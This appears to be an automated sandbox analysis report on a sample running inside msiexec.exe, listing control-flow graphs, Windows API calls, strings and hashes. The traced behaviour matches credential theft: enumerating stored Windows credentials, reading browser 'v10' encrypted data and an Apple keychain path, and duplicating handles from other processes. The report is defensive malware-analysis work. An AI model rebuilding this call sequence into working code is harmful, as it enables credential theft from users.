417c61 37838->37840 37844 417bda 37838->37844 37839 417bf6 UnmapViewOfFile CloseHandle 37839->37839 37839->37844 37842 417c2c 37842->37844 37850 41851e 18 API calls 37842->37850 37844->37839 37844->37840 37844->37842 37845 4175b7 37844->37845 37846 4175d6 CloseHandle 37845->37846 37847 4175c8 37846->37847 37848 4175df 37846->37848 37847->37848 37849 4175ce Sleep 37847->37849 37848->37844 37849->37846 37850->37842 39755 4147f3 39758 414561 39755->39758 39757 414813 39759 41456d 39758->39759 39760 41457f GetPrivateProfileIntW 39758->39760 39763 4143f1 memset _itow WritePrivateProfileStringW 39759->39763 39760->39757 39762 41457a 39762->39757 39763->39762

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 338 40dd85-40ddeb memset call 409bca CreateFileW 341 40ddf1-40de09 call 40afcf call 41352f 338->341 346 40de0b-40de1a NtQuerySystemInformation 341->346 347 40de1c 341->347 348 40de20-40de27 346->348 347->348 349 40de29-40de39 348->349 350 40de3b-40de52 CloseHandle GetCurrentProcessId 348->350 349->341 349->350 351 40de54-40de58 350->351 352 40de7a-40de8e call 413cfa call 413d4c 350->352 351->352 354 40de5a 351->354 362 40de94-40debb call 40e6ad call 409c52 _wcsicmp 352->362 363 40e00c-40e01b call 413d29 352->363 356 40de5d-40de63 354->356 357 40de74-40de78 356->357 358 40de65-40de6c 356->358 357->352 357->356 358->357 360 40de6e-40de71 358->360 360->357 370 40dee7-40def7 OpenProcess 362->370 371 40debd-40dece _wcsicmp 362->371 372 40dff8-40dffb 370->372 373 40defd-40df02 370->373 371->370 374 40ded0-40dee1 _wcsicmp 371->374 372->363 377 40dffd-40e006 372->377 375 40df08 373->375 376 40dfef-40dff2 CloseHandle 373->376 374->370 374->377 378 40df0b-40df10 375->378 376->372 377->362 377->363 379 40df16-40df1d 378->379 380 40dfbd-40dfcb 378->380 379->380 382 40df23-40df4a GetCurrentProcess DuplicateHandle 379->382 380->378 381 40dfd1-40dfd3 380->381 381->376 382->380 383 40df4c-40df76 memset call 41352f 382->383 386 40df78-40df8a 383->386 387 40df8f-40dfbb CloseHandle call 409c52 * 2 _wcsicmp 383->387 386->387 387->380 392 40dfd5-40dfed 387->392 392->376
                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 0040DDAD
                                                                                              • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                            • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                              • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                              • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                              • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                                              • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                                              • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                                              • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                                              • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                                              • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                                              • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                                              • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                                            • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                            • CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                                            • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                            • _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                            • _wcsicmp.MSVCRT ref: 0040DEC5
                                                                                            • _wcsicmp.MSVCRT ref: 0040DED8
                                                                                            • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                                                                                            • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                                                                                            • DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                                                                                            • memset.MSVCRT ref: 0040DF5F
                                                                                            • CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040DF92
                                                                                            • _wcsicmp.MSVCRT ref: 0040DFB2
                                                                                            • CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$Handle$_wcsicmp$CloseProcess$CurrentFileModulememset$??2@CreateDuplicateInformationNameOpenQuerySystem
                                                                                            • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                                                                                            • API String ID: 708747863-3398334509
                                                                                            • Opcode ID: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                                                            • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                                                                                            • Opcode Fuzzy Hash: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                                                            • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 578 413d4c-413da0 call 40b633 CreateToolhelp32Snapshot memset Process32FirstW 581 413f00-413f11 Process32NextW 578->581 582 413da5-413ded OpenProcess 581->582 583 413f17-413f24 CloseHandle 581->583 584 413eb0-413eb5 582->584 585 413df3-413e26 memset call 413f27 582->585 584->581 586 413eb7-413ebd 584->586 593 413e79-413e9d call 413959 call 413ca4 585->593 594 413e28-413e35 585->594 588 413ec8-413eda call 4099f4 586->588 589 413ebf-413ec6 free 586->589 591 413edb-413ee2 588->591 589->591 597 413ee4 591->597 598 413ee7-413efe 591->598 605 413ea2-413eae CloseHandle 593->605 595 413e61-413e68 594->595 596 413e37-413e44 GetModuleHandleW 594->596 595->593 602 413e6a-413e76 595->602 596->595 601 413e46-413e5c GetProcAddress 596->601 597->598 598->581 601->595 602->593 605->584
                                                                                            APIs
                                                                                              • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,?), ref: 00413D6A
                                                                                            • memset.MSVCRT ref: 00413D7F
                                                                                            • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                                                                            • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                                                                            • memset.MSVCRT ref: 00413E07
                                                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                                                                            • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
                                                                                            • CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
                                                                                            • free.MSVCRT ref: 00413EC1
                                                                                            • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                                                                            • CloseHandle.KERNEL32(00000000,00000000,0000022C), ref: 00413F1A
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: Handle$CloseProcess32freememset$AddressCreateFirstModuleNextOpenProcProcessSnapshotToolhelp32
                                                                                            • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                                            • API String ID: 1344430650-1740548384
                                                                                            • Opcode ID: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                                                                                            • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                                                                            • Opcode Fuzzy Hash: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                                                                                            • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9
                                                                                            APIs
                                                                                            • FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
                                                                                            • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                                                                            • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                                                                            • LockResource.KERNEL32(00000000), ref: 004148EF
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: Resource$FindLoadLockSizeof
                                                                                            • String ID:
                                                                                            • API String ID: 3473537107-0
                                                                                            • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                            • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                                                                                            • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                            • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                                                                                            APIs
                                                                                            • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                                                                            • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileFind$FirstNext
                                                                                            • String ID:
                                                                                            • API String ID: 1690352074-0
                                                                                            • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                            • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                                                                            • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                            • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 0041898C
                                                                                            • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: InfoSystemmemset
                                                                                            • String ID:
                                                                                            • API String ID: 3558857096-0
                                                                                            • Opcode ID: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                                            • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                                                                            • Opcode Fuzzy Hash: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                                            • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 0 44553b-445558 call 44db70 3 445599-4455a2 0->3 4 44555a-44557c call 40c768 call 40bdb0 call 4135f7 0->4 5 4455a8-4455e3 memset call 403988 wcsrchr 3->5 6 4457fb 3->6 42 44558e-445594 call 444b06 4->42 43 44557e-44558c call 4136c0 call 41366b 4->43 15 4455e5 5->15 16 4455e8-4455f9 5->16 10 445800-445809 6->10 13 445856-44585f 10->13 14 44580b-44581e call 40a889 call 403e2d 10->14 18 445861-445874 call 40a889 call 403c9c 13->18 19 4458ac-4458b5 13->19 45 445823-445826 14->45 15->16 21 445672-445683 call 40a889 call 403fbe 16->21 22 4455fb-445601 16->22 53 445879-44587c 18->53 23 44594f-445958 19->23 24 4458bb-44592b memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 19->24 87 445685 21->87 88 4456b2-4456b5 call 40b1ab 21->88 30 445605-445607 22->30 31 445603 22->31 28 4459f2-4459fa 23->28 29 44595e-4459ce memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 23->29 139 44592d-445945 call 40b6ef 24->139 140 44594a 24->140 37 445a00-445aa1 memset * 2 call 414c2e call 40b2cc call 409d1f call 40b2cc call 40ae18 28->37 38 445b29-445b32 28->38 157 4459d0-4459e8 call 40b6ef 29->157 158 4459ed 29->158 30->21 41 445609-44560d 30->41 31->30 182 445b08-445b15 call 40ae51 37->182 54 445c7c-445c85 38->54 55 445b38-445b96 memset * 3 38->55 41->21 51 44560f-445641 call 4087b3 call 40a889 call 4454bf 41->51 42->3 43->42 56 44584c-445854 call 40b1ab 45->56 57 445828 45->57 154 445665-445670 call 40b1ab 51->154 155 445643-445663 call 40a9b5 call 4087b3 51->155 67 4458a2-4458aa call 40b1ab 53->67 68 44587e 53->68 63 445d1c-445d25 54->63 64 445c8b-445cf3 memset * 2 call 414c2e call 409d1f call 409b98 54->64 69 445bd4-445c72 call 414c2e call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 55->69 70 445b98-445ba0 55->70 56->13 71 44582e-445847 call 40a9b5 call 4087b3 57->71 76 445fae-445fb2 63->76 77 445d2b-445d3b 63->77 159 445cf5 64->159 160 445cfc-445d03 64->160 67->19 85 445884-44589d call 40a9b5 call 4087b3 68->85 249 445c77 69->249 70->69 86 445ba2-445bcf call 4099c6 call 445403 call 445389 70->86 142 445849 71->142 94 445d3d-445d65 call 409c52 call 40b2cc _wcsicmp 77->94 95 445d88-445e15 memset * 3 call 414c2e call 40b2cc call 409d1f call 409b98 77->95 146 44589f 85->146 86->54 89 44568b-4456a4 call 40a9b5 call 4087b3 87->89 107 4456ba-4456c4 88->107 148 4456a9-4456b0 89->148 165 445d67-445d6c 94->165 166 445d71-445d83 call 445093 94->166 196 445e17 95->196 197 445e1e-445e25 95->197 121 4457f9 107->121 122 4456ca-4456d3 call 413cfa call 413d4c 107->122 121->6 174 4456d8-4456f7 call 40b2cc call 413fa6 122->174 139->140 140->23 142->56 146->67 148->88 148->89 154->107 155->154 157->158 158->28 159->160 171 445d05-445d13 160->171 172 445d17 160->172 176 445fa1-445fa9 call 40b6ef 165->176 166->76 171->172 172->63 206 4456fd-445796 memset * 4 call 409c70 * 3 174->206 207 4457ea-4457f7 call 413d29 174->207 176->76 200 445b17-445b27 call 40aebe 182->200 201 445aa3-445ab0 call 40add4 182->201 196->197 202 445e27-445e59 call 40b2cc call 409d1f call 409b98 197->202 203 445e6b-445e7e call 445093 197->203 200->38 201->182 221 445ab2-445b03 memset call 40b2cc call 409d1f call 445389 201->221 239 445e62-445e69 202->239 240 445e5b 202->240 220 445f67-445f99 call 40b2cc call 409d1f call 409b98 203->220 206->207 248 445798-4457ca call 40b2cc call 409d1f call 409b98 206->248 207->10 220->76 253 445f9b 220->253 221->182 239->203 245 445e83-445ef5 memset call 40b2cc call 409d1f call 40ae18 239->245 240->239 264 445f4d-445f5a call 40ae51 245->264 248->207 265 4457cc-4457e5 call 4087b3 248->265 249->54 253->176 269 445ef7-445f04 call 40add4 264->269 270 445f5c-445f62 call 40aebe 264->270 265->207 269->264 274 445f06-445f38 call 40b2cc call 409d1f call 409b98 269->274 270->220 274->264 281 445f3a-445f48 call 445093 274->281 281->264
                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 004455C2
                                                                                            • wcsrchr.MSVCRT ref: 004455DA
                                                                                            • memset.MSVCRT ref: 0044570D
                                                                                            • memset.MSVCRT ref: 00445725
                                                                                              • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                                                                              • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                                                                              • Part of subcall function 0040BDB0: CredEnumerateW.SECHOST(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                              • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                                                                              • Part of subcall function 0040BDB0: wcsncmp.MSVCRT ref: 0040BE38
                                                                                              • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                                                                              • Part of subcall function 0040BDB0: memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                                              • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                            • memset.MSVCRT ref: 0044573D
                                                                                            • memset.MSVCRT ref: 00445755
                                                                                            • memset.MSVCRT ref: 004458CB
                                                                                            • memset.MSVCRT ref: 004458E3
                                                                                            • memset.MSVCRT ref: 0044596E
                                                                                            • memset.MSVCRT ref: 00445A10
                                                                                            • memset.MSVCRT ref: 00445A28
                                                                                            • memset.MSVCRT ref: 00445AC6
                                                                                              • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                              • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                                                              • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                                                                              • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                              • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                                            • memset.MSVCRT ref: 00445B52
                                                                                            • memset.MSVCRT ref: 00445B6A
                                                                                            • memset.MSVCRT ref: 00445C9B
                                                                                            • memset.MSVCRT ref: 00445CB3
                                                                                            • _wcsicmp.MSVCRT ref: 00445D56
                                                                                            • memset.MSVCRT ref: 00445B82
                                                                                              • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                              • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                              • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                              • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                              • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                              • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                                                                              • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                                                                            • memset.MSVCRT ref: 00445986
                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateHandleProcSize_wcsicmp_wcslwrmemcpywcscatwcscpywcsncmp
                                                                                            • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                                                                            • API String ID: 2263259095-3798722523
                                                                                            • Opcode ID: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                                                            • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                                                                            • Opcode Fuzzy Hash: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                                                            • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                              • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                                              • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                              • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                                              • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                            • SetErrorMode.KERNELBASE(00008001), ref: 00412799
                                                                                            • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000), ref: 004127B2
                                                                                            • EnumResourceTypesW.KERNEL32(00000000), ref: 004127B9
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                                                                                            • String ID: $/deleteregkey$/savelangfile
                                                                                            • API String ID: 2744995895-28296030
                                                                                            • Opcode ID: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                                            • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                                                                            • Opcode Fuzzy Hash: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                                            • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 0040B71C
                                                                                              • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                                                                              • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                                                                            • wcsrchr.MSVCRT ref: 0040B738
                                                                                            • memset.MSVCRT ref: 0040B756
                                                                                            • memset.MSVCRT ref: 0040B7F5
                                                                                            • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                            • CloseHandle.KERNELBASE(00000000,?,?), ref: 0040B838
                                                                                            • memset.MSVCRT ref: 0040B851
                                                                                            • memset.MSVCRT ref: 0040B8CA
                                                                                            • memcmp.MSVCRT(?,v10,00000003), ref: 0040B9BF
                                                                                              • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                              • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                            • memset.MSVCRT ref: 0040BB53
                                                                                            • memcpy.MSVCRT(?,00000000,?,00000000,00000000,?), ref: 0040BB66
                                                                                            • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: memset$Freewcsrchr$AddressCloseCreateFileHandleLibraryLocalProcmemcmpmemcpywcscpy
                                                                                            • String ID: chp$v10
                                                                                            • API String ID: 4290143792-2783969131
                                                                                            • Opcode ID: aa7ff03ddb8a60b54c19e14ecab6b10a2ad5bd81823861da0c4d13f19dc0bdfc
                                                                                            • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                                                                            • Opcode Fuzzy Hash: aa7ff03ddb8a60b54c19e14ecab6b10a2ad5bd81823861da0c4d13f19dc0bdfc
                                                                                            • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 505 4091b8-40921b memset call 40a6e6 call 444432 510 409520-409526 505->510 511 409221-40923b call 40b273 call 438552 505->511 515 409240-409248 511->515 516 409383-4093ab call 40b273 call 438552 515->516 517 40924e-409258 call 4251c4 515->517 529 4093b1 516->529 530 4094ff-40950b call 443d90 516->530 522 40937b-40937e call 424f26 517->522 523 40925e-409291 call 4253cf * 2 call 4253af * 2 517->523 522->516 523->522 553 409297-409299 523->553 531 4093d3-4093dd call 4251c4 529->531 530->510 539 40950d-409511 530->539 540 4093b3-4093cc call 4253cf * 2 531->540 541 4093df 531->541 539->510 543 409513-40951d call 408f2f 539->543 540->531 557 4093ce-4093d1 540->557 545 4094f7-4094fa call 424f26 541->545 543->510 545->530 553->522 555 40929f-4092a3 553->555 555->522 556 4092a9-4092ba 555->556 558 4092bc 556->558 559 4092be-4092e3 memcpy memcmp 556->559 557->531 560 4093e4-4093fb call 4253af * 2 557->560 558->559 561 409333-409345 memcmp 559->561 562 4092e5-4092ec 559->562 560->545 570 409401-409403 560->570 561->522 565 409347-40935f memcpy 561->565 562->522 564 4092f2-409331 memcpy * 2 562->564 567 409363-409378 memcpy 564->567 565->567 567->522 570->545 571 409409-40941b memcmp 570->571 571->545 572 409421-409433 memcmp 571->572 573 4094a4-4094b6 memcmp 572->573 574 409435-40943c 572->574 573->545 576 4094b8-4094ed memcpy * 2 573->576 574->545 575 409442-4094a2 memcpy * 3 574->575 577 4094f4 575->577 576->577 577->545
                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 004091E2
                                                                                              • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                            • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                            • memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                                                            • memcpy.MSVCRT(?,00000023,?), ref: 0040930C
                                                                                            • memcpy.MSVCRT(?,?,00000010), ref: 00409325
                                                                                            • memcmp.MSVCRT(00000000,0045A4E8,00000006), ref: 0040933B
                                                                                            • memcpy.MSVCRT(?,00000015,?), ref: 00409357
                                                                                            • memcpy.MSVCRT(?,?,00000010), ref: 00409370
                                                                                            • memcmp.MSVCRT(00000000,004599B8,00000010), ref: 00409411
                                                                                            • memcmp.MSVCRT(00000000,0045A500,00000006), ref: 00409429
                                                                                            • memcpy.MSVCRT(?,00000023,?), ref: 00409462
                                                                                            • memcpy.MSVCRT(?,?,00000010), ref: 0040947E
                                                                                            • memcpy.MSVCRT(?,?,00000020), ref: 0040949A
                                                                                            • memcmp.MSVCRT(00000000,0045A4F8,00000006), ref: 004094AC
                                                                                            • memcpy.MSVCRT(?,00000015,?), ref: 004094D0
                                                                                            • memcpy.MSVCRT(?,?,00000020), ref: 004094E8
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                                                                            • String ID:
                                                                                            • API String ID: 3715365532-3916222277
                                                                                            • Opcode ID: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
                                                                                            • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                                                                            • Opcode Fuzzy Hash: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
                                                                                            • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59
